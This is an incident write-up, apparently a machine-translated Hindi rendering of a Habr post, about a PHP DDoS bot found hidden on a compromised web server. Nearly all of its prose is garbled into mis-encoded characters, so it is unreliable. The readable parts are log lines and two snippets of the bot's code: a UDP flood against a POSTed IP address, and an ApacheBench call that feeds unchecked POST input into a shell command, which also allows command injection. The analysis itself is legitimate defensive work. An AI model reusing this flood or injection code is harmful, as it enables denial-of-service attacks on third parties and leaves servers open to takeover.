PHP DDOS bot рд╕рд░реНрд╡рд░ рдХреЗ рдЖрд╕рдкрд╛рд╕ рдЪрд▓рддрд╛ рд╣реИ

рдЖрдЬ, рд▓рдЧрднрдЧ рджреЛ рдмрдЬреЗ, рдЬрдм рдореИрдВ рдмрд┐рд╕реНрддрд░ рдкрд░ рдЬрд╛рдирд╛ рдЪрд╛рд╣рддрд╛ рдерд╛, рдореЗрд░реЗ рдПрдХ рджреЛрд╕реНрдд рдиреЗ рдореБрдЭреЗ рд╕реНрдХрд╛рдЗрдк рдкрд░ рд▓рд┐рдЦрд╛ред рдкрд┐рдЫрд▓реЗ рд╕рд╛рд▓, рдореИрдВрдиреЗ рдЙрдиреНрд╣реЗрдВ рдЕрдкрдиреЗ рдХрдИ рд╕рд░реНрд╡рд░реЛрдВ рдХреЛ рд╕рдВрдЪрд╛рд▓рд┐рдд рдХрд░рдиреЗ рдореЗрдВ рдорджрдж рдХреАред рдЗрддрдиреА рджреЗрд░ рд╕реЗ, рдЙрдиреНрд╣реЛрдВрдиреЗ рд▓рд┐рдЦрд╛ рдХрд┐ рдЙрдирдХреЗ рд╕рд░реНрд╡рд░ рдореЗрдВ рд╕реЗ рдПрдХ рдХрд╛ рдиреЗрдЯрд╡рд░реНрдХ рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рдкреВрд░реА рддрд░рд╣ рд╕реЗ рднрд░рд╛ рд╣реБрдЖ рд╣реИ, рдЬрд┐рд╕реЗ mrtg рд╕рдордп-рд╕рд╛рд░рдгреА рдХреЛ рджреЗрдЦрддреЗ рд╣реБрдПред рдореИрдВрдиреЗ рджреЗрдЦрд╛, рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ, рдореИрдВ ssh рддрдХ рднреА рдирд╣реАрдВ рдкрд╣реБрдВрдЪ рд╕рдХрд╛, рд╕рд░реНрд╡рд░ рдХреЛ рд░рд┐рдмреВрдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдФрд░ рд╕реНрдерд┐рддрд┐ рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рд╢реБрд░реВ рд╣реБрдЖ ...

рдЫрд╡рд┐

рд╕реНрдерд┐рддрд┐ рд╡рд┐рд╢реНрд▓реЗрд╖рдг

рд╕рд░реНрд╡рд░ рдХреЛ рд░рд┐рдмреВрдЯ рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж, рдХреБрдЫ рд╕рдордп рдмрд╛рдж, рдпрд╛рддрд╛рдпрд╛рдд рдлрд┐рд░ рд╕реЗ рджрд┐рдЦрд╛рдИ рджрд┐рдпрд╛ред рдореИрдВрдиреЗ iptraf рд▓реЙрдиреНрдЪ рдХрд┐рдпрд╛, рдЗрд╕рдиреЗ рдПрдХ IP рдкрддреЗ рдкрд░ UDP рдкреИрдХреЗрдЯреЛрдВ рдХреА рдПрдХ рдмрдбрд╝реА рд╕рдВрдЦреНрдпрд╛ рдХреЛ рджрд┐рдЦрд╛рдпрд╛ - " 171.161.224.16 ", рдЬрдм рдореИрдВрдиреЗ рдЗрд╕реЗ dns5.bankofamerica.com рдореЗрдВ рдкреНрд░рд╕реНрддреБрдд рдХрд┐рдпрд╛ : рд╕рдм рдХреБрдЫ рдЬрдЧрд╣ рдореЗрдВ рдЧрд┐рд░ рдЧрдпрд╛, рдЬрд╛рд╣рд┐рд░ рд╣реИ рдХрд┐ рд╕рд░реНрд╡рд░ рд╕реЗ рдПрдХ dDoS рд╣реИред

IPtables рдореЗрдВ рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд IPред рдореИрдВрдиреЗ рд╢реАрд░реНрд╖ рдкрд░ рджреЗрдЦрд╛, httpd рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдореЗрдВ рд╕реЗ рдПрдХ рдиреЗ 100% рд╕реАрдкреАрдпреВ рдЦрд╛рдпрд╛, рдЙрд╕ рдкрд░ рд╕реНрдЯреНрд░реЗрд╕ рд╕реЗрдЯ рдХрд┐рдпрд╛, рдореИрдВрдиреЗ рдЙрд╕реА рдкрд░рд┐рдЪрд┐рдд рдкрддреЗ рдХреЛ рджреЗрдЦрд╛ред рдЪреВрдВрдХрд┐ рд╕рд░реНрд╡рд░ рдкрд░ рдХреЛрдИ access_logs рдирд╣реАрдВ рд╣реИрдВ, рдФрд░ error_logs рдЦрд╛рд▓реА рдереЗ, рдореИрдВрдиреЗ рд╕реБрдВрджрд░ php рдореЙрдбреНрдпреВрд▓ baxtep ( рд╣рдм рдкрд░ рд▓реЗрдЦ ) рдХреЗ рд▓реЙрдЧ рдХреА рдУрд░ рд░реБрдЦ рдХрд┐рдпрд╛, рдЬреЛ php рджреБрднрд╛рд╖рд┐рдпрд╛ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХрд┐рд╕реА рднреА рдХрдорд╛рдВрдб рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд╕рднреА рдкреНрд░рдпрд╛рд╕реЛрдВ рдХреЛ рд▓реЙрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд▓рд┐рдЦрддрд╛ рд╣реИред рдореИрдВрдиреЗ рдПрдХ RPM рдХрд┐рдпрд╛ рд╣реИ рдФрд░ рдЗрд╕реЗ рд╣рдореЗрд╢рд╛ рд╡рд╛рд░реНрдб рд╕рд░реНрд╡рд░реЛрдВ рдореЗрдВ рд░рдЦрд╛ рд╣реИ, рдХреЗрд╡рд▓ рдорд╛рдорд▓реЗ рдореЗрдВред рдирдЧреНрди рдЖрдВрдЦреЛрдВ рдХреЗ рд╕рд╛рде, рдореИрдВрдиреЗ рд╡рд╛рдВрдЫрд┐рдд рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рдирд╛рдо рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд┐рдпрд╛:

2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl-bin` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl-cgi` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php

рдлрд╝рд╛рдЗрд▓ рдХреЛрдб рд╕рдВрджрд░реНрдн рджреНрд╡рд╛рд░рд╛ рдЙрдкрд▓рдмреНрдз рд╣реИ, рдореИрдВрдиреЗ рдЗрд╕реЗ google рдореЗрдВ рдлрд╛рдЗрд▓ рд╕реЗ рдЗрд╕рдХреА oknoproblembro рд▓рд╛рдЗрди рджреНрд╡рд╛рд░рд╛ рдкрд╛рдпрд╛, Google рдХрд╛ рдХреЗрд╡рд▓ рдПрдХ рдкрд░рд┐рдгрд╛рдо рд╣реИ, рд╣реМрд╕рд▓реЗ рд╕реЗ рдореИрдВрдиреЗ рд╕реЛрдЪрд╛ рдФрд░ рд╣рдм рдкрд░ рдЗрд╕рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд▓рд┐рдЦрдиреЗ рдХрд╛ рдлреИрд╕рд▓рд╛ рдХрд┐рдпрд╛ред

рдХреЛрдб рд╡рд┐рд╢реНрд▓реЗрд╖рдг

рдлрд╝рд╛рдЗрд▓ рдХрд╛ рдЖрдХрд╛рд░ рдХреЗрд╡рд▓ 3kb рд╣реИ, рдХреЛрдб рдЬрдЯрд┐рд▓ рдирд╣реАрдВ рд╣реИред рдмреЙрдЯ рдХреА рдореБрдЦреНрдп рд╡рд┐рд╢реЗрд╖рддрд╛рдПрдВ:

рдореИрдВ рдЕрдзрд┐рдХ рд╡рд┐рд╕реНрддрд╛рд░ рд╕реЗ dDoS рдкрд░ рдзреНрдпрд╛рди рдХреЗрдиреНрджреНрд░рд┐рдд рдХрд░реВрдВрдЧрд╛ред

  case "ust": $page = curPageURL(); $ip = $_POST['ip']; $port = "11"; $out = $page."\n"; $socket = stream_socket_client("udp://$ip:$port"); if ($socket) { stream_set_write_buffer($socket, 0); stream_socket_sendto($socket,$out); } fclose($socket); break; 

рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдкреИрд░рд╛рдореАрдЯрд░ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд▓рдХреНрд╖рд┐рдд рдХрд┐рдП рдЬрд╛ рд░рд╣реЗ рд▓рдХреНрд╖реНрдп рдХрд╛ рдкрддрд╛ рдкреНрд░рд╛рдкреНрдд рдХрд░рддрд╛ рд╣реИ, рдпреВрдбреАрдкреА рд╕реЙрдХреЗрдЯ рдЦреЛрд▓рддрд╛ рд╣реИ рдФрд░, рдЬрдмрдХрд┐ рд╕реЙрдХреЗрдЯ рдореМрдЬреВрдж рд╣реИ, 11 рд╡реЗрдВ рдкреЛрд░реНрдЯ рдХреЗ рд▓рд┐рдП рдЕрдиреБрд░реЛрдз рднреЗрдЬрддрд╛ рд╣реИред рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдпрд╣ рджрд┐рд▓рдЪрд╕реНрдк рд╣реИ рдХрд┐ рдбреЗрдЯрд╛ рдореЗрдВ рдпрд╣ рдЕрдкрдирд╛ рд╕реНрд╡рдпрдВ рдХрд╛ рдкрддрд╛ рджреЗрддрд╛ рд╣реИред
 function curPageURL(){ $pageURL = 'http'; if ($_SERVER["HTTPS"] == "on") { $pageURL .= "s"; } $pageURL .= "://"; if ($_SERVER["SERVER_PORT"] != "80") { $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"]; } else { $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; } return $pageURL; } 

рд╕рд╡рд╛рд▓ "рдХреНрдпреЛрдВ?" рдореЗрд░реЗ рд╕рд┐рд░ рдХреЛ 12 рдШрдВрдЯреЗ рддрдХ рдирд╣реАрдВ рдЫреЛрдбрд╝рд╛ рд╣реИред

рдПрдм рдЙрдкрдпреЛрдЧрд┐рддрд╛ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рджреВрд╕рд░рд╛ рд╣рдорд▓рд╛ рддрд░реАрдХрд╛ рд╣реИ:
  case "ab": $url = $_POST['url']; $c = $_POST['c']; $n = $_POST['n']; cmdexec("ab -c $c -n $n $url"); break; 

рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдЖрдиреЗ рд╡рд╛рд▓реЗ рдорд╛рдкрджрдВрдбреЛрдВ рдХреА рдХреЛрдИ рдЬрд╛рдВрдЪ рдирд╣реАрдВ рд╣реИ рдФрд░ рдЖрдк рд╕рд░реНрд╡рд░ рдкрд░ рдордирдорд╛рдирд╛ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

рдЗрд╕рд╕реЗ рдкрд╣рд▓реЗ, рдореИрдВ рд╡реНрдпрдХреНрддрд┐рдЧрдд рд░реВрдк рд╕реЗ php рдкрд░ рдПрдХ рдпреВрдбреАрдкреА ddos тАЛтАЛрдХреЗ рдкрд╛рд░ рдирд╣реАрдВ рдЖрдпрд╛ рдерд╛, рдЙрдиреНрд╣реЛрдВрдиреЗ рд╣рдореЗрдВ рдЗрд╕ рд╕реЗ рдирд╣реАрдВ рднрд░рд╛, рдпрд╣ рдЧреВрдЧрд▓ - рдЬрд╛рд╣рд┐рд░ рд╣реИ рдХрд┐ рд▓реЛрдЧ рд▓рдВрдмреЗ рд╕рдордп рд╕реЗ рд╡рд┐рднрд┐рдиреНрди рд╕реЙрд╕ рдХреЗ рд╕рд╛рде рдЕрднреНрдпрд╛рд╕ рдХрд░ рд░рд╣реЗ рд╣реИрдВред

рдирд┐рд╖реНрдХрд░реНрд╖

Source: https://habr.com/ru/post/In136166/


All Articles